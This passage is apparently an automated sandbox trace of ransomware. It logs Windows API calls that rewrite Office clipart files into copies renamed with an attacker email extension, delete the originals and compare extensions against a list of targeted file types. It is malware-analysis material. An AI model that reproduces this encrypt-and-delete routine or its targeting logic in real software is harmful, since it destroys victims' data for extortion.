dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.904] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199469.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199469.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0199.905] GetLastError () returned 0x0 [0199.905] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x35bc, lpOverlapped=0x0) returned 1 [0200.000] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x35c0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x35c0, lpOverlapped=0x0) returned 1 [0200.051] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.052] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0200.052] SetEndOfFile (hFile=0x390) returned 1 [0200.052] CloseHandle (hObject=0x390) returned 1 [0200.052] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.052] SetEndOfFile (hFile=0x378) returned 1 [0200.053] CloseHandle (hObject=0x378) returned 1 [0200.053] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199469.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.053] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199469.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199469.wmf")) returned 1 [0200.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199469.WMF") returned 68 [0200.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199469.WMF") returned 68 [0200.054] lstrlenW (lpString=".doc") returned 4 [0200.054] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.054] lstrlenW (lpString=".docx") returned 5 [0200.054] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0200.054] lstrlenW (lpString=".pdf") returned 4 [0200.054] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.054] lstrlenW (lpString=".xls") returned 4 [0200.054] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.054] lstrlenW (lpString=".xlsx") returned 5 [0200.054] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0200.054] lstrlenW (lpString=".ppt") returned 4 [0200.054] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199469.WMF") returned 68 [0200.054] lstrlenW (lpString=".zip") returned 4 [0200.054] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.054] lstrlenW (lpString=".rar") returned 4 [0200.054] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.054] lstrlenW (lpString=".bz2") returned 4 [0200.054] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.054] lstrlenW (lpString=".7z") returned 3 [0200.054] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199469.WMF") returned 68 [0200.054] lstrlenW (lpString=".dbf") returned 4 [0200.054] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199469.WMF") returned 68 [0200.054] lstrlenW (lpString=".1cd") returned 4 [0200.054] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199469.WMF") returned 68 [0200.055] lstrlenW (lpString=".jpg") returned 4 [0200.055] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.055] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.056] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.056] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199609.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199609.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0200.057] GetLastError () returned 0x0 [0200.057] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x302c, lpOverlapped=0x0) returned 1 [0200.139] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x3030, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x3030, lpOverlapped=0x0) returned 1 [0200.140] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.140] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0200.141] SetEndOfFile (hFile=0x390) returned 1 [0200.141] CloseHandle (hObject=0x390) returned 1 [0200.141] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.141] SetEndOfFile (hFile=0x378) returned 1 [0200.142] CloseHandle (hObject=0x378) returned 1 [0200.142] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199609.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.142] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199609.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199609.wmf")) returned 1 [0200.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199609.WMF") returned 68 [0200.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199609.WMF") returned 68 [0200.142] lstrlenW (lpString=".doc") returned 4 [0200.142] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.142] lstrlenW (lpString=".docx") returned 5 [0200.143] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0200.143] lstrlenW (lpString=".pdf") returned 4 [0200.143] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.143] lstrlenW (lpString=".xls") returned 4 [0200.143] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.143] lstrlenW (lpString=".xlsx") returned 5 [0200.143] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0200.143] lstrlenW (lpString=".ppt") returned 4 [0200.143] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199609.WMF") returned 68 [0200.143] lstrlenW (lpString=".zip") returned 4 [0200.143] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.143] lstrlenW (lpString=".rar") returned 4 [0200.143] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.143] lstrlenW (lpString=".bz2") returned 4 [0200.143] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.143] lstrlenW (lpString=".7z") returned 3 [0200.143] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199609.WMF") returned 68 [0200.143] lstrlenW (lpString=".dbf") returned 4 [0200.143] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199609.WMF") returned 68 [0200.143] lstrlenW (lpString=".1cd") returned 4 [0200.143] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199609.WMF") returned 68 [0200.143] lstrlenW (lpString=".jpg") returned 4 [0200.143] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.144] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.144] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.144] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200289.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200289.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0200.145] GetLastError () returned 0x0 [0200.145] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0xa0b0, lpOverlapped=0x0) returned 1 [0200.198] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xa0c0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xa0c0, lpOverlapped=0x0) returned 1 [0200.319] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.319] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0200.320] SetEndOfFile (hFile=0x390) returned 1 [0200.320] CloseHandle (hObject=0x390) returned 1 [0200.320] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.320] SetEndOfFile (hFile=0x378) returned 1 [0200.321] CloseHandle (hObject=0x378) returned 1 [0200.321] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200289.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.322] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200289.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200289.wmf")) returned 1 [0200.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200289.WMF") returned 68 [0200.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200289.WMF") returned 68 [0200.322] lstrlenW (lpString=".doc") returned 4 [0200.322] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.322] lstrlenW (lpString=".docx") returned 5 [0200.322] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0200.322] lstrlenW (lpString=".pdf") returned 4 [0200.322] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.322] lstrlenW (lpString=".xls") returned 4 [0200.323] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.323] lstrlenW (lpString=".xlsx") returned 5 [0200.323] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0200.323] lstrlenW (lpString=".ppt") returned 4 [0200.323] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200289.WMF") returned 68 [0200.323] lstrlenW (lpString=".zip") returned 4 [0200.323] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.323] lstrlenW (lpString=".rar") returned 4 [0200.323] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.323] lstrlenW (lpString=".bz2") returned 4 [0200.323] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.323] lstrlenW (lpString=".7z") returned 3 [0200.323] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200289.WMF") returned 68 [0200.323] lstrlenW (lpString=".dbf") returned 4 [0200.323] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200289.WMF") returned 68 [0200.323] lstrlenW (lpString=".1cd") returned 4 [0200.323] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200289.WMF") returned 68 [0200.323] lstrlenW (lpString=".jpg") returned 4 [0200.323] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.324] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.324] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.324] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200521.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200521.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0200.324] GetLastError () returned 0x0 [0200.324] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x273e, lpOverlapped=0x0) returned 1 [0200.357] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x2740, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x2740, lpOverlapped=0x0) returned 1 [0200.358] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.358] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0200.358] SetEndOfFile (hFile=0x390) returned 1 [0200.359] CloseHandle (hObject=0x390) returned 1 [0200.359] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.359] SetEndOfFile (hFile=0x378) returned 1 [0200.360] CloseHandle (hObject=0x378) returned 1 [0200.360] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200521.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.360] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200521.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200521.wmf")) returned 1 [0200.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200521.WMF") returned 68 [0200.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200521.WMF") returned 68 [0200.361] lstrlenW (lpString=".doc") returned 4 [0200.361] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.361] lstrlenW (lpString=".docx") returned 5 [0200.361] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0200.361] lstrlenW (lpString=".pdf") returned 4 [0200.361] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.361] lstrlenW (lpString=".xls") returned 4 [0200.361] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.361] lstrlenW (lpString=".xlsx") returned 5 [0200.361] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0200.361] lstrlenW (lpString=".ppt") returned 4 [0200.361] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200521.WMF") returned 68 [0200.362] lstrlenW (lpString=".zip") returned 4 [0200.362] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.362] lstrlenW (lpString=".rar") returned 4 [0200.362] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.362] lstrlenW (lpString=".bz2") returned 4 [0200.362] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.362] lstrlenW (lpString=".7z") returned 3 [0200.362] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.362] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200521.WMF") returned 68 [0200.362] lstrlenW (lpString=".dbf") returned 4 [0200.362] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.362] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200521.WMF") returned 68 [0200.362] lstrlenW (lpString=".1cd") returned 4 [0200.362] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.362] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200521.WMF") returned 68 [0200.362] lstrlenW (lpString=".jpg") returned 4 [0200.362] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.362] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.362] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.363] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0211981.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0211981.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0200.363] GetLastError () returned 0x0 [0200.363] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x6e74, lpOverlapped=0x0) returned 1 [0200.378] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x6e80, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x6e80, lpOverlapped=0x0) returned 1 [0200.379] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.379] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0200.379] SetEndOfFile (hFile=0x390) returned 1 [0200.379] CloseHandle (hObject=0x390) returned 1 [0200.379] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.379] SetEndOfFile (hFile=0x378) returned 1 [0200.382] CloseHandle (hObject=0x378) returned 1 [0200.382] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0211981.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.382] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0211981.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0211981.wmf")) returned 1 [0200.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0211981.WMF") returned 68 [0200.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0211981.WMF") returned 68 [0200.383] lstrlenW (lpString=".doc") returned 4 [0200.383] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.383] lstrlenW (lpString=".docx") returned 5 [0200.383] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0200.383] lstrlenW (lpString=".pdf") returned 4 [0200.383] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.383] lstrlenW (lpString=".xls") returned 4 [0200.383] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.383] lstrlenW (lpString=".xlsx") returned 5 [0200.383] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0200.383] lstrlenW (lpString=".ppt") returned 4 [0200.383] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0211981.WMF") returned 68 [0200.383] lstrlenW (lpString=".zip") returned 4 [0200.384] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.384] lstrlenW (lpString=".rar") returned 4 [0200.384] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.391] lstrlenW (lpString=".bz2") returned 4 [0200.391] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.391] lstrlenW (lpString=".7z") returned 3 [0200.391] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0211981.WMF") returned 68 [0200.391] lstrlenW (lpString=".dbf") returned 4 [0200.391] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0211981.WMF") returned 68 [0200.392] lstrlenW (lpString=".1cd") returned 4 [0200.392] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0211981.WMF") returned 68 [0200.392] lstrlenW (lpString=".jpg") returned 4 [0200.392] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.392] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.392] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212601.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212601.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0200.393] GetLastError () returned 0x0 [0200.393] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x25cc, lpOverlapped=0x0) returned 1 [0200.408] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x25d0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x25d0, lpOverlapped=0x0) returned 1 [0200.410] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.410] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0200.410] SetEndOfFile (hFile=0x390) returned 1 [0200.410] CloseHandle (hObject=0x390) returned 1 [0200.410] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.410] SetEndOfFile (hFile=0x378) returned 1 [0200.411] CloseHandle (hObject=0x378) returned 1 [0200.411] SetFileAttributesW 